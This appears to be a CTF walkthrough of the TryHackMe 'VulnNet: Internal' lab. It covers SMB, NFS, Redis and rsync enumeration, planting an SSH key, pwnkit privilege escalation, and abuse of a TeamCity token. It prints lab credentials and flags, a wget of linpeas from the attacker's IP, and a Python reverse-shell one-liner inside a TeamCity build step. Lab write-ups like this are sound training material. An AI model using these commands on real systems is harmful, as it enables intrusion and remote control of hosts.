VulnNet: Internal (SMB, NFS, Redis, Port Forwarding)

First, we need to enumerate using nmap.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal  
╰─➤  nmap -A 10.10.207.6 | tee nmap.log                                                                          130 ↵
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-24 20:57 +0630
Nmap scan report for 10.10.207.6
Host is up (0.24s latency).
Not shown: 993 closed ports
PORT     STATE    SERVICE     VERSION
22/tcp   open     ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
|   256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
|_  256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
111/tcp  open     rpcbind     2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      35721/tcp6  mountd
|   100005  1,2,3      45401/tcp   mountd
|   100005  1,2,3      59949/udp6  mountd
|   100005  1,2,3      60579/udp   mountd
|   100021  1,3,4      34197/tcp   nlockmgr
|   100021  1,3,4      35019/tcp6  nlockmgr
|   100021  1,3,4      37326/udp   nlockmgr
|   100021  1,3,4      38819/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
139/tcp  open     netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open     netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp  open     rsync       (protocol version 31)
2049/tcp open     nfs_acl     3 (RPC #100227)
9090/tcp filtered zeus-admin
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -41m02s, deviation: 1h09m16s, median: -1m03s
|_nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: vulnnet-internal
|   NetBIOS computer name: VULNNET-INTERNAL\x00
|   Domain name: \x00
|   FQDN: vulnnet-internal
|_  System time: 2022-04-24T16:27:04+02:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-04-24T14:27:04
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 75.78 seconds

Scan using rustscan.

22/tcp    open  ssh          syn-ack
111/tcp   open  rpcbind      syn-ack
139/tcp   open  netbios-ssn  syn-ack
445/tcp   open  microsoft-ds syn-ack
873/tcp   open  rsync        syn-ack
2049/tcp  open  nfs          syn-ack
6379/tcp  open  redis        syn-ack
34197/tcp open  unknown      syn-ack
45401/tcp open  unknown      syn-ack
60411/tcp open  unknown      syn-ack
60551/tcp open  unknown      syn-ack

Port 139,445

You will find some interesing shares.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal  
╰─➤  smbclient -L 10.10.207.6
Enter WORKGROUP\hnl's password: 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	shares          Disk      VulnNet Business Shares
	IPC$            IPC       IPC Service (vulnnet-internal server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

Connect to this shares and download all files.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal  
╰─➤  smbclient '\\10.10.207.6\shares'                                                                            130 ↵
Enter WORKGROUP\hnl's password: 
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Feb  2 15:50:09 2021
  ..                                  D        0  Tue Feb  2 15:58:11 2021
  temp                                D        0  Sat Feb  6 18:15:10 2021
  data                                D        0  Tue Feb  2 15:57:33 2021

		11309648 blocks of size 1024. 3278676 blocks available
smb: \> recurse ON
smb: \> prompt OFF
smb: \> mget *
getting file \temp\services.txt of size 38 as temp/services.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \data\data.txt of size 48 as data/data.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
getting file \data\business-req.txt of size 190 as data/business-req.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \>

You can find the very first flag at /temp/services.txt

╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal  
╰─➤  cat temp/services.txt 
THM{0a09d51e488f5fa105d8d866a497440a}

The content of data.txt and business-req.txt in /data.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal/data  
╰─➤  cat business-req.txt 
We just wanted to remind you that we’re waiting for the DOCUMENT you agreed to send us so we can complete the TRANSACTION we discussed.
If you have any questions, please text or phone us.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal/data  
╰─➤  cat data.txt 
Purge regularly data that is not needed anymore

Port 2049

You can see some interesting share in nfs.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal  
╰─➤  showmount -e 10.10.207.6
Export list for 10.10.207.6:
/opt/conf *

Mount to local. Nothing interesting in this share.

╭─hnl@hnl /mnt/nfs-share/wildmidi  
╰─➤  sudo mount -t nfs 10.10.207.6:/opt/conf /mnt/nfs-share

You can find redis password in /redis/redis.conf

Port 6379

Connect with redis-cli.

╭─hnl@hnl /mnt/nfs-share  
╰─➤  redis-cli -h 10.10.207.6 -a 'B65Hx562F@ggAZ@F'
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.207.6:6379>

Here is a useful link for redis pentest https://book.hacktricks.xyz/pentesting/6379-pentesting-redis. Enumerate redis and read the flag.

10.10.207.6:6379> KEYS *
1) "int"
2) "marketlist"
3) "tmp"
4) "internal flag"
5) "authlist"
10.10.207.6:6379> GET "internal flag"
"THM{ff8e518addbbddb74531a724236a8221}"

Enumerate redis and read the key.

0.10.85.164:6379> LRANGE marketlist 1 16
1) "Penetration Testing"
2) "Programming"
3) "Data Analysis"
4) "Analytics"
5) "Marketing"
6) "Media Streaming"
10.10.207.6:6379> LRANGE authlist 0 50
1) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
2) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
3) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg=="
4) "QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNz

Decode the base64.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal  
╰─➤  echo 'QXV0aG9yaXphdGlvbiBmb3IgcnN5bmM6Ly9yc3luYy1jb25uZWN0QDEyNy4wLjAuMSB3aXRoIHBhc3N3b3JkIEhjZzNIUDY3QFRXQEJjNzJ2Cg==' | base64 -d
Authorization for rsync://rsync-connect@127.0.0.1 with password Hcg3HP67@TW@Bc72v

Port 873

Here is a useful link of rsync pentest https://book.hacktricks.xyz/pentesting/873-pentesting-rsync.

╭─hnl@hnl /mnt/nfs-share/redis  
╰─➤  nmap -sV --script "rsync-list-modules" -p873 10.10.207.6
Starting Nmap 7.80 ( https://nmap.org ) at 2022-04-24 23:07 +0630
Nmap scan report for 10.10.207.6
Host is up (0.24s latency).

PORT    STATE SERVICE VERSION
873/tcp open  rsync   (protocol version 31)
| rsync-list-modules: 
|_  files          	Necessary home interaction

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.70 seconds

List the share folder.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal  
╰─➤  rsync -av --list-only rsync://rsync-connect@10.10.207.6/files                                                                                5 ↵
Password: 
receiving incremental file list
drwxr-xr-x          4,096 2021/02/01 19:21:14 .
drwxr-xr-x          4,096 2021/02/06 19:19:29 sys-internal
-rw-------             61 2021/02/06 19:19:28 sys-internal/.Xauthority
lrwxrwxrwx              9 2021/02/01 20:03:19 sys-internal/.bash_history -> /dev/null
-rw-r--r--            220 2021/02/01 19:21:14 sys-internal/.bash_logout
-rw-r--r--          3,771 2021/02/01 19:21:14 sys-internal/.bashrc
-rw-r--r--             26 2021/02/01 19:23:18 sys-internal/.dmrc
-rw-r--r--            807 2021/02/01 19:21:14 sys-internal/.profile

Download share folder into our local machine's folder.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal  
╰─➤  rsync -av rsync://rsync-connect@10.10.207.6/files ./rsync-files

Generate ssh key.

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHmsE/qACwaksUEoBvDE4wFu0/N5eZeNQEX9upOp8Bh4KTZsUcMqo7OSdztZbvkSwwp0S6C3mk9WLioJbQ2dDFC64ZyT/LUAgNZgZkSRZtufQa9lhUgqNYhg/0oT1juH5rGTJhoGa8MROpRhp/LiKXw8g4wOQggrG+xqrnCG84PCcb0bq73XW7XMYN9koLXokwl3GSlX/AkSn3VWgBcnj73IX2eI2yvYSAzckYyWeu9fR6EX/j8Rfj3Z7Tsy0W4iuhHwSGPJHX8yDms9Sx07nQmMGGKW+RmQ6p1dqDt9g/R1L2aXDJLJnZOGzR4ZqdxFpyl3R/R026HXKyeSCSAvaE34GIzBowe6g9K4h/Ewe3zwIBlLW8TGq7L7EBPR2j6d2yYSbniH3GMio88N+vmF4E919gMMlgMqi4fJOhoy/l++4vuBqKAEpGEcywblNLw4YSe59dSBurrFeTNrC3O6CNyO8GyDtQ3wxNOGI7nMe7yOesabNTdz9qDRXdbpyXDwE= hnl@hnl

Upload it.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal  
╰─➤  rsync -av ./authorized_keys rsync://rsync-connect@10.10.207.6/files/sys-internal/.ssh/
Password: 
sending incremental file list
authorized_keys

sent 672 bytes  received 35 bytes  157.11 bytes/sec
total size is 561  speedup is 0.79

Finally, we can connect ssh with our own private key.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal  
╰─➤  ssh -i id_rsa sys-internal@10.10.207.6
The authenticity of host '10.10.207.6 (10.10.207.6)' can't be established.
ECDSA key fingerprint is SHA256:0ysriVjo72WRJI6UecJ9s8z6QHPNngSiMUKWFTO6Vr4.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.207.6' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

541 packages can be updated.
342 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

sys-internal@vulnnet-internal:~$

User

You can read the user flag.

sys-internal@vulnnet-internal:~$ cat user.txt 
THM{da7c20696831f253e0afaca8b83c07ab}

Download linpeas and enumerate the system. The system is vulnerable with pwnkit exploit. Here is Poc https://github.com/arthepsy/CVE-2021-4034

sys-internal@vulnnet-internal:~/Desktop$ wget http://10.9.0.63:1234/linpeas
sys-internal@vulnnet-internal:~/Desktop$ chmod 777 linpeas 
sys-internal@vulnnet-internal:~/Desktop$ ./linpeas

Root

sys-internal@vulnnet-internal:~/Desktop$ gcc exploit.c -o exploit
sys-internal@vulnnet-internal:~/Desktop$ chmod 777 exploit
sys-internal@vulnnet-internal:~/Desktop$ ./exploit 
# whoami
root
# cat /root/root.txt
THM{e8996faea46df09dba5676dd271c60bd}
#

The Truth (Root)

With ss command, you will see some opened TCP port.

sys-internal@vulnnet-internal:~$ ss -t
State              Recv-Q          Send-Q                          Local Address:Port                            Peer Address:Port           
ESTAB              0               72                                10.10.207.6:ssh                                10.9.0.63:33534          
CLOSE-WAIT         1               0                          [::ffff:127.0.0.1]:34921                     [::ffff:127.0.0.1]:8111           
ESTAB              0               0                          [::ffff:127.0.0.1]:32799                     [::ffff:127.0.0.1]:8111           
ESTAB              0               0                          [::ffff:127.0.0.1]:8111                      [::ffff:127.0.0.1]:32799

Let's make local port forwarding.

╭─hnl@hnl ~/Desktop/ctf/tryhackme/vulnnet-internal  
╰─➤  ssh -i id_rsa sys-internal@10.10.207.6 -L 8080:127.0.0.1:8111
Welcome to Ubuntu 18.04 LTS (GNU/Linux 4.15.0-135-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com

When you broswe, http://127.0.0.1:8080, you will see teamcity page. We will need Authentication Token to login.

You will find Timecity directory on /.

sys-internal@vulnnet-internal:~$ ls -al /
total 533824
drwxr-xr-x  24 root root      4096 Feb  6  2021 .
drwxr-xr-x  24 root root      4096 Feb  6  2021 ..
drwxr-xr-x   2 root root      4096 Feb  2  2021 bin
drwxr-xr-x   3 root root      4096 Feb  1  2021 boot
drwx------   2 root root      4096 Feb  1  2021 .cache
drwxr-xr-x  17 root root      3720 Apr 25 03:42 dev
drwxr-xr-x 129 root root     12288 Feb  7  2021 etc
drwxr-xr-x   3 root root      4096 Feb  1  2021 home
lrwxrwxrwx   1 root root        34 Feb  1  2021 initrd.img -> boot/initrd.img-4.15.0-135-generic
lrwxrwxrwx   1 root root        33 Feb  1  2021 initrd.img.old -> boot/initrd.img-4.15.0-20-generic
drwxr-xr-x  18 root root      4096 Feb  1  2021 lib
drwxr-xr-x   2 root root      4096 Feb  1  2021 lib64
drwx------   2 root root     16384 Feb  1  2021 lost+found
drwxr-xr-x   4 root root      4096 Feb  2  2021 media
drwxr-xr-x   2 root root      4096 Feb  1  2021 mnt
drwxr-xr-x   4 root root      4096 Feb  2  2021 opt
dr-xr-xr-x 139 root root         0 Apr 25 03:42 proc
drwx------   8 root root      4096 Feb  6  2021 root
drwxr-xr-x  27 root root       880 Apr 25 08:37 run
drwxr-xr-x   2 root root      4096 Feb  2  2021 sbin
drwxr-xr-x   2 root root      4096 Feb  1  2021 srv
-rw-------   1 root root 546529280 Feb  1  2021 swapfile
dr-xr-xr-x  13 root root         0 Apr 25 03:42 sys
drwxr-xr-x  12 root root      4096 Feb  6  2021 TeamCity
drwxrwxrwt  11 root root      4096 Apr 25 08:41 tmp
drwxr-xr-x  10 root root      4096 Feb  1  2021 usr
drwxr-xr-x  13 root root      4096 Feb  1  2021 var
lrwxrwxrwx   1 root root        31 Feb  1  2021 vmlinuz -> boot/vmlinuz-4.15.0-135-generic
lrwxrwxrwx   1 root root        30 Feb  1  2021 vmlinuz.old -> boot/vmlinuz-4.15.0-20-generic

Go to this directory and find token.

sys-internal@vulnnet-internal:/TeamCity$ grep -R token

logs/catalina.out:[TeamCity] Super user authentication token: 5812627377764625872 (use empty username with the token as the password to access the server)
logs/catalina.out:[TeamCity] Super user authentication token: 4319495926070655877 (use empty username with the token as the password to access the server)
logs/catalina.out:[TeamCity] Super user authentication token: 4319495926070655877 (use empty username with the token as the password to access the server)

After login, you will see a dashboard.

At build step, run with python.

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.0.63",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")

In netcat session, we got reverse shell.

PreviousGallery (SQLI, Backup, nano)NextDebug (PHP Deserialization, motd)

Last updated 3 years ago

hashtagPort 139,445

hashtagPort 2049

hashtagPort 6379

hashtagPort 873

hashtagUser

hashtagRoot

hashtagThe Truth (Root)